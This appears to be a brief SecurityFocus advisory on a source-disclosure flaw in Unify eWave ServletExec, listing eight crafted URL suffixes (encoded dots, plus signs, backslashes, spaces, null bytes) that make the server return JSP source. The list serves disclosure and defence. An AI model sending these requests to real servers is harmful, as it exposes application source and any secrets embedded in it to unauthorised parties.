Unify eWave ServletExec JSP Source Disclosure Vulnerability

Any of the following URL requests will yield the source of the specified JSP file:

http://target/directory/jsp/file.jsp.
http://target/directory/jsp/file.jsp%2E
http://target/directory/jsp/file.jsp+
http://target/directory/jsp/file.jsp%2B
http://target/directory/jsp/file.jsp\
http://target/directory/jsp/file.jsp%5C
http://target/directory/jsp/file.jsp%20
http://target/directory/jsp/file.jsp%00


 

Privacy Statement
Copyright 2010, SecurityFocus